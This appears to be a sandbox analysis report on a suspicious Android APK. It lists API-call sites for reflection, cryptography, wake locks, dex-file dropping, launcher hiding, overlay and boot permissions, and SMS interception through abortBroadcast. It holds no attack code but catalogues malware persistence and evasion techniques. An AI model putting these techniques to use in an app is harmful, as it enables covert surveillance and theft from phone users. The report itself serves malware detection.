Source: okhttp3.internal.platform.android.CloseGuard;->createAndOpen:11	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.android.CloseGuard;->warnIfOpen:14	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.android.HwBuildEx;->getSystemPropertiesInt:8	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.android.SystemUtils;->getSystemProperties:21	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.appgallery.serviceverifykit.api.a;->a:105	API Call: java.lang.reflect.Method.invoke
Source: com.alipay.security.mobile.module.b.d;->a:8	API Call: java.lang.reflect.Method.invoke
Source: com.alipay.security.mobile.module.b.b;->m:273	API Call: java.lang.reflect.Method.invoke
Source: com.alipay.security.mobile.module.b.b;->v:485	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$a;->b:4	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$b;->b:4	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$a;->b:7	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$b;->b:7	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$c;->b:4	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$b;->b:16	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$c;->b:7	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$b;->b:22	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$c;->b:16	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$b;->b:32	API Call: java.lang.reflect.Method.invoke
Source: com.kwai.video.b.b.b.e$c;->b:26	API Call: java.lang.reflect.Method.invoke
Source: com.kwai.video.b.b.b.e$b;->b:36	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$d;->b:4	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$e;->b:5	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$d;->b:7	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$d;->b:16	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$e;->b:17	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.b.b.b.e$d;->b:25	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.updatesdk.b.a.b.c;->a:10	API Call: java.lang.reflect.Field.get
Source: com.huawei.updatesdk.b.a.b.c;->b:27	API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$1;->write:7	API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$1;->writeField:16	API Call: java.lang.reflect.Field.get
Source: com.facebook.react.bridge.JavaMethodWrapper;->invoke:138	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.updatesdk.a.b.c.c.c;->a:3	API Call: java.lang.reflect.Field.get
Source: com.huawei.updatesdk.a.b.c.c.b;->toJson:235	API Call: java.lang.reflect.Field.get
Source: com.huawei.hms.framework.common.NetworkUtil;->getMobileRsrp:108	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.framework.common.NetworkUtil;->getMobileRsrpLevel:124	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.framework.common.ReflectionUtils;->getFieldObj:16	API Call: java.lang.reflect.Field.get
Source: com.huawei.hms.framework.common.ReflectionUtils;->getStaticFieldObj:40	API Call: java.lang.reflect.Field.get
Source: com.huawei.hms.framework.common.ReflectionUtils;->invoke:50	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.framework.common.SystemPropUtils;->getProperty:7	API Call: java.lang.reflect.Method.invoke
Source: com.kwai.video.b.b.d.a;->a:27	API Call: java.lang.reflect.Method.invoke
Source: com.kwai.video.b.b.d.a;->a:31	API Call: java.lang.reflect.Method.invoke
Source: com.facebook.litho.displaylist.Utils;->safeInvoke:3	API Call: java.lang.reflect.Method.invoke
Source: com.kwai.video.wayne.player.f.i;->a:12	API Call: java.lang.reflect.Method.invoke
Source: com.unionpay.mobile.android.global.a;->b:46	API Call: java.lang.reflect.Field.get
Source: com.google.gson.FieldAttributes;->get:4	API Call: java.lang.reflect.Field.get
Source: com.huawei.updatesdk.a.a.d.h.c;->a:16	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.updatesdk.a.a.d.h.c;->a:37	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.updatesdk.a.a.d.h.c;->c:75	API Call: java.lang.reflect.Field.get
Source: com.huawei.updatesdk.a.a.d.h.c;->a:204	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.hatool.f;->a:4	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.hatool.z0;->c:6	API Call: java.lang.reflect.Method.invoke
Source: vpj.dlomnfe.lmdfwblpk.hisci.kfvgsrhmkgglgvslmvco;->ittnnheimjopesbn:15	API Call: java.lang.reflect.Method.invoke
Source: kotlin.coroutines.jvm.internal.ModuleNameRetriever;->getModuleName:29	API Call: java.lang.reflect.Method.invoke
Source: kotlin.coroutines.jvm.internal.ModuleNameRetriever;->getModuleName:31	API Call: java.lang.reflect.Method.invoke
Source: kotlin.coroutines.jvm.internal.ModuleNameRetriever;->getModuleName:33	API Call: java.lang.reflect.Method.invoke
Source: kotlin.coroutines.jvm.internal.DebugMetadataKt;->getLabel:23	API Call: java.lang.reflect.Field.get
Source: kotlin.internal.PlatformImplementations;->addSuppressed:9	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.Util;->readFieldOrNull:246	API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.UnsafeAllocator$1;->newInstance:5	API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.UnsafeAllocator$2;->newInstance:5	API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.UnsafeAllocator$3;->newInstance:4	API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.UnsafeAllocator;->create:27	API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.UnsafeAllocator;->create:34	API Call: java.lang.reflect.Method.invoke
Source: com.facebook.litho.TextLayoutBuilder;->fixLayout:14	API Call: java.lang.reflect.Field.get
Source: okhttp3.internal.platform.AndroidPlatform$AndroidCertificateChainCleaner;->clean:16	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.AndroidPlatform$CustomTrustRootIndex;->findByIssuerAndSignature:28	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.AndroidPlatform;->api23IsCleartextTrafficPermitted:31	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.AndroidPlatform;->api24IsCleartextTrafficPermitted:38	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.AndroidPlatform;->isCleartextTrafficPermitted:102	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Jdk8WithJettyBootPlatform$AlpnProvider;->invoke:46	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Jdk8WithJettyBootPlatform;->afterHandshake:19	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Jdk8WithJettyBootPlatform;->configureTlsExtensions:35	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Jdk8WithJettyBootPlatform;->getSelectedProtocol:42	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Jdk9Platform;->configureTlsExtensions:19	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Jdk9Platform;->getSelectedProtocol:29	API Call: java.lang.reflect.Method.invoke
Source: com.xiaomi.push.al;->a:54	API Call: java.lang.reflect.Field.get
Source: com.xiaomi.push.al;->a:60	API Call: java.lang.reflect.Method.invoke
Source: com.xiaomi.push.al;->b:96	API Call: java.lang.reflect.Method.invoke
Source: com.xiaomi.push.dx;->a:8	API Call: java.lang.reflect.Method.invoke
Source: com.xiaomi.push.jc;->a:5	API Call: java.lang.reflect.Method.invoke
Source: com.xiaomi.push.v;->a:11	API Call: java.lang.reflect.Method.invoke
Source: com.xiaomi.push.x;->a:3	API Call: java.lang.reflect.Method.invoke
Source: com.xiaomi.push.y;->a:5	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.push.r;->a:22	API Call: java.lang.reflect.Field.get
Source: com.huawei.hms.push.s;->a:6	API Call: java.lang.reflect.Field.get
Source: com.huawei.hms.push.s;->a:13	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.push.t;->b:20	API Call: java.lang.reflect.Field.get
Source: com.huawei.hms.push.t;->b:24	API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.reflect.UnsafeReflectionAccessor;->getUnsafeInstance:13	API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.reflect.UnsafeReflectionAccessor;->makeAccessibleWithUnsafe:31	API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.reflect.UnsafeReflectionAccessor;->makeAccessibleWithUnsafe:41	API Call: java.lang.reflect.Method.invoke
Source: retrofit2.Retrofit$1;->invoke:4	API Call: java.lang.reflect.Method.invoke
Source: com.facebook.react.views.scroll.d;->getOverScrollerFromParent:82	API Call: java.lang.reflect.Field.get
Source: com.facebook.react.views.scroll.e;->getOverScrollerFromParent:88	API Call: java.lang.reflect.Field.get
Source: com.xiaomi.push.service.m;->a:843	API Call: java.lang.reflect.Method.invoke
Source: com.xiaomi.push.service.z;->a:15	API Call: java.lang.reflect.Method.invoke
Source: com.facebook.react.views.textinput.ReactTextInputManager;->setCursorColor:218	API Call: java.lang.reflect.Field.get
Source: com.facebook.fbui.textlayoutbuilder.b;->a:46	API Call: java.lang.reflect.Field.get
Source: ikw.jnqhirs.hepkvhgos.tjbhl.lmrbvqqbubrflde;->rcscwvfdrfvugbmfredjegvh:83	API Call: java.lang.reflect.Method.invoke
Source: com.facebook.react.uimanager.bq$k;->a:20	API Call: java.lang.reflect.Method.invoke
Source: com.facebook.react.uimanager.bq$k;->a:25	API Call: java.lang.reflect.Method.invoke
Source: com.facebook.react.uimanager.bq$k;->a:47	API Call: java.lang.reflect.Method.invoke
Source: com.facebook.react.uimanager.bq$k;->a:52	API Call: java.lang.reflect.Method.invoke
Source: com.facebook.react.uimanager.e;->b:114	API Call: java.lang.reflect.Method.invoke
Source: com.facebook.react.uimanager.e;->b:116	API Call: java.lang.reflect.Method.invoke
Source: com.alipay.sdk.util.l;->d:389	API Call: java.lang.reflect.Method.invoke
Source: com.kwai.video.hodor.util.f;->b:53	API Call: java.lang.reflect.Method.invoke
Source: com.unionpay.mobile.android.utils.f;->e:85	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.utils.JsonUtil;->createInnerJsonString:9	API Call: java.lang.reflect.Field.get
Source: com.hhmedic.android.sdk.uikit.utils.HHDeviceHelper;->getLowerCaseName:29	API Call: java.lang.reflect.Method.invoke
Source: com.unionpay.tsmservice.widget.UPSaftyKeyboard;->d:56	API Call: java.lang.reflect.Field.get
Source: com.unionpay.tsmservice.widget.UPSaftyKeyboard;->d:61	API Call: java.lang.reflect.Method.invoke
Source: com.unionpay.tsmservice.mi.widget.UPSaftyKeyboard;->d:66	API Call: java.lang.reflect.Field.get
Source: com.unionpay.tsmservice.mi.widget.UPSaftyKeyboard;->d:71	API Call: java.lang.reflect.Method.invoke
Source: com.alipay.sdk.widget.e;->c:139	API Call: java.lang.reflect.Method.invoke
Source: com.alipay.sdk.widget.e;->c:142	API Call: java.lang.reflect.Method.invoke
Source: com.alipay.sdk.widget.e;->c:145	API Call: java.lang.reflect.Method.invoke
Source: com.facebook.litho.widget.SynchronizedTypefaceHelper;->setupSynchronizedTypeface:7	API Call: java.lang.reflect.Field.get
Source: com.facebook.litho.widget.SynchronizedTypefaceHelper;->setupSynchronizedTypeface:16	API Call: java.lang.reflect.Field.get
Source: com.unionpay.mobile.android.widgets.u;->f:199	API Call: java.lang.reflect.Method.invoke

Persistence and Installation Behavior

Drops a new dex file

Source: Android App

File dump: /data/user/0/com.mtnyrvojt.qtbxtwjnq/app_app_dex/lkfupve.gvo

Jump to dropped file

Source: com.huawei.hms.availableupdate.f0;->a:146	API Call: android.content.Intent.setDataAndType("UpdateWizard","application/vnd.android.package-archive")
Source: com.unionpay.UPPayAssistEx;->a:262	API Call: android.content.Intent.setDataAndType(n/a,"application/vnd.android.package-archive")
Source: com.unionpay.UPPayAssistEx;->installUPPayPlugin:676	API Call: android.content.Intent.setDataAndType(n/a,"application/vnd.android.package-archive")
Source: com.unionpay.mobile.android.nocard.views.l;->a:242	API Call: android.content.Intent.setDataAndType(n/a,"application/vnd.android.package-archive")

Source: com.alipay.security.mobile.module.d.d;->a:40	API Call: java.io.FileWriter.<init>
Source: com.alipay.security.mobile.module.d.d;->a:41	API Call: java.io.FileWriter.<init>
Source: com.xiaomi.clientreport.processor.g;->a:64	API Call: java.io.FileWriter.<init>
Source: com.xiaomi.push.i;->b:61	API Call: java.io.FileWriter.<init>

Source: com.mtnyrvojt.qtbxtwjnq.services.EndlessService;->startService:38	API Call: android.os.PowerManager.newWakeLock
Source: com.mtnyrvojt.qtbxtwjnq.services.KingService;->resetWakeLock:30	API Call: android.os.PowerManager.newWakeLock
Source: com.kwai.video.aemonplayer.AemonMediaPlayerAdapter;->setWakeMode:1143	API Call: android.os.PowerManager.newWakeLock
Source: com.kwai.video.player.kwai_player.KwaiMediaPlayer;->setWakeMode:783	API Call: android.os.PowerManager.newWakeLock

Source: submitted apk

Request permission: android.permission.RECEIVE_BOOT_COMPLETED

Hooking and other Techniques for Hiding and Protection

Removes its application launcher (likely to stay hidden)

Source: com.xiaomi.push.ix;->run:7	API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Source: com.xiaomi.mipush.sdk.af;->q:238	API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Source: com.xiaomi.push.service.br;->run:10	API Call: android.content.pm.PackageManager.setComponentEnabledSetting

Source: com.huawei.hms.framework.common.ActivityUtil;->isForeground:11	API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.kwai.video.player.kwai_player.Util;->getProcessName:8	API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.unionpay.tsmservice.mi.UPTsmAddon;->isAppRunInBackground:128	API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.alipay.sdk.util.l;->b:243	API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.huawei.hms.aaid.utils.BaseUtils;->isMainProc:30	API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.huawei.hms.utils.UIUtil;->getProcessName:31	API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.huawei.hms.utils.UIUtil;->isBackground:43	API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.huawei.hms.push.utils.PluginUtil;->a:48	API Call: android.app.ActivityManager.getRunningAppProcesses

Source: com.mtnyrvojt.qtbxtwjnq.services.SmsReceiver;->onReceive:44

API Call: com.mtnyrvojt.qtbxtwjnq.services.SmsReceiver.abortBroadcast

Source: submitted apk

Request permission: android.permission.SYSTEM_ALERT_WINDOW

Source: submitted apk

Request permission: android.permission.KILL_BACKGROUND_PROCESSES

Source: com.mtnyrvojt.qtbxtwjnq.models.EncodedResourceInputStreamSilent;->constructCipher:101	API Call: javax.crypto.Cipher.getInstance
Source: com.mtnyrvojt.qtbxtwjnq.models.EncodedResourceInputStreamSilent;->constructCipher:107	API Call: javax.crypto.Cipher.init
Source: com.mtnyrvojt.qtbxtwjnq.models.EncodedResourceInputStream;->constructCipher:188	API Call: javax.crypto.Cipher.getInstance
Source: com.mtnyrvojt.qtbxtwjnq.models.EncodedResourceInputStream;->constructCipher:194	API Call: javax.crypto.Cipher.init
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilEncryption;->decryptMessage:55	API Call: javax.crypto.Cipher.getInstance
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilEncryption;->decryptMessage:57	API Call: javax.crypto.Cipher.init
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilEncryption;->decryptMessage:58	API Call: javax.crypto.Cipher.doFinal
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilEncryption;->digestAndEncodeMessage:63	API Call: java.security.MessageDigest.getInstance
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilEncryption;->digestAndEncodeMessage:64	API Call: java.security.MessageDigest.digest
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilEncryption;->digestCompare:68	API Call: java.security.MessageDigest.getInstance
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilEncryption;->digestCompare:69	API Call: java.security.MessageDigest.digest
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilEncryption;->digestMessage:73	API Call: java.security.MessageDigest.getInstance
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilEncryption;->digestMessage:74	API Call: java.security.MessageDigest.digest
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilEncryption;->encryptMessage:87	API Call: javax.crypto.Cipher.getInstance
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilEncryption;->encryptMessage:88	API Call: javax.crypto.Cipher.init
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilEncryption;->encryptMessage:90	API Call: javax.crypto.Cipher.doFinal
Source: com.alipay.security.mobile.module.a.a;->e:25	API Call: java.security.MessageDigest.getInstance
Source: com.alipay.security.mobile.module.a.a;->e:28	API Call: java.security.MessageDigest.update
Source: com.alipay.security.mobile.module.a.a;->e:29	API Call: java.security.MessageDigest.digest
Source: com.alipay.security.mobile.module.a.a.b;->a:3	API Call: java.security.MessageDigest.getInstance
Source: com.alipay.security.mobile.module.a.a.b;->a:6	API Call: java.security.MessageDigest.update
Source: com.alipay.security.mobile.module.a.a.b;->a:7	API Call: java.security.MessageDigest.digest
Source: com.alipay.security.mobile.module.a.a.c;->a:20	API Call: javax.crypto.Cipher.getInstance
Source: com.alipay.security.mobile.module.a.a.c;->a:22	API Call: javax.crypto.Cipher.init
Source: com.alipay.security.mobile.module.a.a.c;->a:28	API Call: javax.crypto.Cipher.doFinal
Source: com.alipay.security.mobile.module.a.a.c;->b:68	API Call: javax.crypto.Cipher.getInstance
Source: com.alipay.security.mobile.module.a.a.c;->b:70	API Call: javax.crypto.Cipher.init
Source: com.alipay.security.mobile.module.a.a.c;->b:71	API Call: javax.crypto.Cipher.doFinal
Source: com.huawei.agconnect.config.a.g;->a:14	API Call: java.security.MessageDigest.getInstance
Source: com.huawei.agconnect.config.a.g;->a:15	API Call: java.security.MessageDigest.digest
Source: com.huawei.agconnect.config.a.h;->a:20	API Call: javax.crypto.Cipher.getInstance
Source: com.huawei.agconnect.config.a.h;->a:22	API Call: javax.crypto.Cipher.init
Source: com.huawei.agconnect.config.a.h;->a:23	API Call: javax.crypto.Cipher.doFinal
Source: com.huawei.secure.android.common.encrypt.keystore.aes.a;->a:26	API Call: javax.crypto.KeyGenerator.generateKey
Source: com.huawei.secure.android.common.encrypt.keystore.aes.a;->a:38	API Call: javax.crypto.Cipher.getInstance
Source: com.huawei.secure.android.common.encrypt.keystore.aes.a;->a:40	API Call: javax.crypto.Cipher.init
Source: com.huawei.secure.android.common.encrypt.keystore.aes.a;->a:41	API Call: javax.crypto.Cipher.doFinal
Source: com.huawei.secure.android.common.encrypt.keystore.aes.a;->b:65	API Call: javax.crypto.Cipher.getInstance
Source: com.huawei.secure.android.common.encrypt.keystore.aes.a;->b:67	API Call: javax.crypto.Cipher.init
Source: com.huawei.secure.android.common.encrypt.keystore.aes.a;->b:68	API Call: javax.crypto.Cipher.doFinal
Source: com.huawei.secure.android.common.encrypt.aes.a;->a:42	API Call: javax.crypto.Cipher.getInstance
Source: com.huawei.secure.android.common.encrypt.aes.a;->a:44	API Call: javax.crypto.Cipher.init
Source: com.huawei.secure.android.common.encrypt.aes.a;->a:45	API Call: javax.crypto.Cipher.doFinal
Source: com.huawei.secure.android.common.encrypt.aes.a;->b:91	API Call: javax.crypto.Cipher.getInstance
Source: com.huawei.secure.android.common.encrypt.aes.a;->b:93	API Call: javax.crypto.Cipher.init
Source: com.huawei.secure.android.common.encrypt.aes.a;->b:94	API Call: javax.crypto.Cipher.doFinal
Source: com.huawei.appgallery.serviceverifykit.api.a;->a:68	API Call: java.security.MessageDigest.getInstance
Source: com.huawei.appgallery.serviceverifykit.api.a;->a:69	API Call: java.security.MessageDigest.digest
Source: com.bumptech.glide.load.engine.cache.j;->a:8	API Call: java.security.MessageDigest.getInstance
Source: com.bumptech.glide.load.engine.cache.j;->a:10	API Call: java.security.MessageDigest.digest
Source: com.kwai.video.b.b.d.b;->a:5	API Call: java.security.MessageDigest.getInstance
Source: com.kwai.video.b.b.d.b;->a:8	API Call: java.security.MessageDigest.update
Source: com.kwai.video.b.b.d.b;->a:9	API Call: java.security.MessageDigest.digest
Source: com.huawei.hms.framework.network.grs.d.b;->a:7	API Call: java.security.MessageDigest.getInstance
Source: com.huawei.hms.framework.network.grs.d.b;->a:8	API Call: java.security.MessageDigest.digest
Source: com.huawei.updatesdk.a.a.d.d;->a:2	API Call: java.security.MessageDigest.getInstance
Source: com.huawei.updatesdk.a.a.d.d;->a:5	API Call: java.security.MessageDigest.update
Source: com.huawei.updatesdk.a.a.d.d;->a:6	API Call: java.security.MessageDigest.digest
Source: com.huawei.updatesdk.a.a.d.g;->a:16	API Call: java.security.MessageDigest.getInstance
Source: com.huawei.updatesdk.a.a.d.g;->a:17	API Call: java.security.MessageDigest.update
Source: com.huawei.updatesdk.a.a.d.g;->a:19	API Call: java.security.MessageDigest.digest
Source: com.alipay.sdk.encrypt.d;->b:9	API Call: javax.crypto.Cipher.getInstance
Source: com.alipay.sdk.encrypt.d;->b:10	API Call: javax.crypto.Cipher.init
Source: com.alipay.sdk.encrypt.e;->a:9	API Call: javax.crypto.Cipher.getInstance
Source: com.alipay.sdk.encrypt.e;->a:12	API Call: javax.crypto.Cipher.init
Source: com.alipay.sdk.encrypt.e;->a:13	API Call: javax.crypto.Cipher.doFinal
Source: com.alipay.sdk.encrypt.d;->b:15	API Call: javax.crypto.Cipher.doFinal
Source: com.alipay.sdk.encrypt.e;->b:21	API Call: javax.crypto.Cipher.getInstance
Source: com.alipay.sdk.encrypt.e;->b:24	API Call: javax.crypto.Cipher.init
Source: com.alipay.sdk.encrypt.e;->b:25	API Call: javax.crypto.Cipher.doFinal
Source: com.bumptech.glide.load.engine.f;->a:20	API Call: java.security.MessageDigest.update
Source: com.bumptech.glide.load.engine.f;->a:21	API Call: java.security.MessageDigest.update
Source: com.bumptech.glide.load.engine.f;->a:28	API Call: java.security.MessageDigest.update
Source: com.bumptech.glide.load.engine.f;->a:35	API Call: java.security.MessageDigest.update
Source: com.bumptech.glide.load.engine.f;->a:42	API Call: java.security.MessageDigest.update
Source: com.bumptech.glide.load.engine.f;->a:49	API Call: java.security.MessageDigest.update
Source: com.bumptech.glide.load.engine.f;->a:56	API Call: java.security.MessageDigest.update
Source: com.bumptech.glide.load.engine.k;->a:6	API Call: java.security.MessageDigest.update
Source: com.huawei.secure.android.common.encrypt.hash.b;->a:11	API Call: java.security.MessageDigest.getInstance
Source: com.huawei.secure.android.common.encrypt.hash.b;->a:14	API Call: java.security.MessageDigest.update
Source: com.huawei.secure.android.common.encrypt.hash.b;->a:15	API Call: java.security.MessageDigest.digest
Source: com.huawei.hms.hatool.e;->a:27	API Call: javax.crypto.Cipher.getInstance
Source: com.huawei.hms.hatool.e;->a:28	API Call: javax.crypto.Cipher.init
Source: com.huawei.hms.hatool.e;->a:29	API Call: javax.crypto.Cipher.doFinal
Source: com.unionpay.mobile.android.hce.a;->a:17	API Call: javax.crypto.Cipher.getInstance
Source: com.unionpay.mobile.android.hce.a;->a:18	API Call: javax.crypto.Cipher.init
Source: com.unionpay.mobile.android.hce.a;->a:19	API Call: javax.crypto.Cipher.doFinal
Source: com.unionpay.mobile.android.hce.a;->b:38	API Call: javax.crypto.Cipher.getInstance
Source: com.unionpay.mobile.android.hce.a;->b:39	API Call: javax.crypto.Cipher.init
Source: com.unionpay.mobile.android.hce.a;->b:40	API Call: javax.crypto.Cipher.doFinal
Source: okio.Buffer;->digest:12	API Call: java.security.MessageDigest.getInstance
Source: okio.Buffer;->digest:15	API Call: java.security.MessageDigest.update
Source: okio.Buffer;->digest:19	API Call: java.security.MessageDigest.update
Source: okio.Buffer;->digest:22	API Call: java.security.MessageDigest.digest
Source: okio.ByteString;->digest$jvm:71	API Call: java.security.MessageDigest.getInstance
Source: okio.ByteString;->digest$jvm:73	API Call: java.security.MessageDigest.digest
Source: okio.HashingSink;-><init>:9	API Call: java.security.MessageDigest.getInstance
Source: okio.HashingSink;->hash:38	API Call: java.security.MessageDigest.digest
Source: okio.HashingSink;->write:54	API Call: java.security.MessageDigest.update
Source: okio.HashingSource;-><init>:9	API Call: java.security.MessageDigest.getInstance
Source: okio.HashingSource;->hash:38	API Call: java.security.MessageDigest.digest
Source: okio.HashingSource;->read:57	API Call: java.security.MessageDigest.update
Source: okio.SegmentedByteString;->digest$jvm:43	API Call: java.security.MessageDigest.getInstance
Source: okio.SegmentedByteString;->digest$jvm:48	API Call: java.security.MessageDigest.update
Source: okio.SegmentedByteString;->digest$jvm:49	API Call: java.security.MessageDigest.digest
Source: com.huawei.hms.opendevice.r;->a:5	API Call: java.security.MessageDigest.getInstance
Source: com.huawei.hms.opendevice.r;->a:6	API Call: java.security.MessageDigest.update
Source: com.huawei.hms.opendevice.r;->a:7	API Call: java.security.MessageDigest.digest
Source: com.xiaomi.push.ac;->e:47	API Call: java.security.MessageDigest.getInstance
Source: com.xiaomi.push.ac;->e:50	API Call: java.security.MessageDigest.digest
Source: com.xiaomi.push.ao;->a:2	API Call: java.security.MessageDigest.getInstance
Source: com.xiaomi.push.ao;->a:5	API Call: java.security.MessageDigest.digest
Source: com.xiaomi.push.ap;->a:10	API Call: java.security.MessageDigest.getInstance
Source: com.xiaomi.push.ap;->a:14	API Call: java.security.MessageDigest.update
Source: com.xiaomi.push.ap;->a:15	API Call: java.security.MessageDigest.digest
Source: com.xiaomi.push.ap;->c:24	API Call: java.security.MessageDigest.getInstance
Source: com.xiaomi.push.ap;->c:26	API Call: java.security.MessageDigest.update
Source: com.xiaomi.push.ap;->c:27	API Call: java.security.MessageDigest.digest
Source: com.xiaomi.push.aq;->a:10	API Call: java.security.MessageDigest.getInstance
Source: com.xiaomi.push.aq;->a:12	API Call: java.security.MessageDigest.update
Source: com.xiaomi.push.aq;->a:13	API Call: java.security.MessageDigest.digest
Source: com.xiaomi.push.aq;->a:42	API Call: java.security.MessageDigest.getInstance
Source: com.xiaomi.push.aq;->a:43	API Call: java.security.MessageDigest.update
Source: com.xiaomi.push.aq;->a:44	API Call: java.security.MessageDigest.digest
Source: com.xiaomi.push.aq;->b:60	API Call: java.security.MessageDigest.getInstance
Source: com.xiaomi.push.aq;->b:62	API Call: java.security.MessageDigest.update
Source: com.xiaomi.push.aq;->b:63	API Call: java.security.MessageDigest.digest
Source: com.xiaomi.push.ge;->a:6	API Call: javax.crypto.Cipher.getInstance
Source: com.xiaomi.push.ge;->a:7	API Call: javax.crypto.Cipher.init
Source: com.xiaomi.push.ge;->a:9	API Call: javax.crypto.Cipher.doFinal
Source: com.xiaomi.push.ge;->b:11	API Call: javax.crypto.Cipher.doFinal
Source: com.unionpay.mobile.android.pboctransaction.samsung.a;->a:4	API Call: javax.crypto.Cipher.getInstance
Source: com.unionpay.mobile.android.pboctransaction.samsung.a;->a:8	API Call: javax.crypto.Cipher.init
Source: com.unionpay.mobile.android.pboctransaction.samsung.a;->a:9	API Call: javax.crypto.Cipher.doFinal
Source: com.hhmedic.android.sdk.base.utils.secret.HHCheckSumBuilder;->encode:2	API Call: java.security.MessageDigest.getInstance
Source: com.hhmedic.android.sdk.base.utils.secret.HHCheckSumBuilder;->encode:4	API Call: java.security.MessageDigest.update
Source: com.hhmedic.android.sdk.base.utils.secret.HHCheckSumBuilder;->encode:5	API Call: java.security.MessageDigest.digest
Source: com.hhmedic.android.sdk.base.utils.secret.HHSecretUtils;->getSHA1:9	API Call: java.security.MessageDigest.getInstance
Source: com.hhmedic.android.sdk.base.utils.secret.HHSecretUtils;->getSHA1:12	API Call: java.security.MessageDigest.update
Source: com.hhmedic.android.sdk.base.utils.secret.HHSecretUtils;->getSHA1:13	API Call: java.security.MessageDigest.digest
Source: com.xiaomi.push.service.av;->a:10	API Call: javax.crypto.Cipher.getInstance
Source: com.xiaomi.push.service.av;->a:12	API Call: javax.crypto.Cipher.init
Source: com.xiaomi.push.service.av;->a:21	API Call: javax.crypto.Cipher.doFinal
Source: com.xiaomi.push.service.av;->a:22	API Call: javax.crypto.Cipher.doFinal
Source: com.bumptech.glide.signature.c;->a:8	API Call: java.security.MessageDigest.update
Source: com.alipay.sdk.util.l;->a:80	API Call: java.security.MessageDigest.getInstance
Source: com.alipay.sdk.util.l;->a:82	API Call: java.security.MessageDigest.update
Source: com.alipay.sdk.util.l;->a:83	API Call: java.security.MessageDigest.digest
Source: com.kwai.video.hodor.util.a;->a:3	API Call: java.security.MessageDigest.getInstance
Source: com.kwai.video.hodor.util.a;->a:6	API Call: java.security.MessageDigest.update
Source: com.kwai.video.hodor.util.a;->a:7	API Call: java.security.MessageDigest.digest
Source: com.huawei.secure.android.common.ssl.util.a;->a:57	API Call: java.security.MessageDigest.getInstance
Source: com.huawei.secure.android.common.ssl.util.a;->a:58	API Call: java.security.MessageDigest.digest
Source: com.huawei.secure.android.common.ssl.util.a;->c:123	API Call: java.security.MessageDigest.getInstance
Source: com.huawei.secure.android.common.ssl.util.a;->c:124	API Call: java.security.MessageDigest.update
